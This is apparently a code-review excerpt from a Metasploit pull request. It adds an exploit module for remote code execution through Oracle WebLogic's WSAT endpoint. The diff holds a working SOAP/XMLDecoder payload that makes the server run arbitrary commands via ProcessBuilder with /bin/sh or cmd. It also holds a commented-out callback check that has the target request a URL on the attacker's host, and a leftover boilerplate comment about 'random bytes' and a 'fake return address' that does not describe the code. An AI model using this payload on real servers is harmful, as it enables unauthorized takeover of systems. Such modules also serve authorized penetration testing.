modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,136 @@
+          ],
+        'DisclosureDate' => "Oct 19 2017",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
+      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptInt.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
+    ])
+  end
+
+  def cmd_base
+    if target_platform == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
+  end
+
+  def cmd_opt
+    if target_platform == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+  def process_builder_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>#{cmd_base}</string>
+            </void>
+            <void index="1">
+              <string>#{cmd_opt}</string>
+            </void>
+            <void index="2">
+              <string>#{payload.encoded.encode(xml: :text)}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+# Not sure how to catch the response, so I'll leave this here in case someone can help
+# This payload is used by sending to the RHOST and then you will receive an HTTP request
+# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
+#   def http_check_payload
+#     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+#   <soapenv:Header>
+#     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+#       <java version="1.8" class="java.beans.XMLDecoder">
+#         <object id="url" class="java.net.URL">
+#           <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
+#         </object>
+#         <object idref="url">
+#           <void id="stream" method = "openStream" />
+#         </object>
+#       </java>
+#     </work:WorkContext>
+#     </soapenv:Header>
+#   <soapenv:Body/>
+# </soapenv:Envelope>}
+#   end
+
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    xml_payload = process_builder_payload
```

Comment:
If you've left this variable for clarity, that's fine. You can probably drop it, though. `send_request_cgi` can take `process_builder_payload` directly.

Reply:
Changed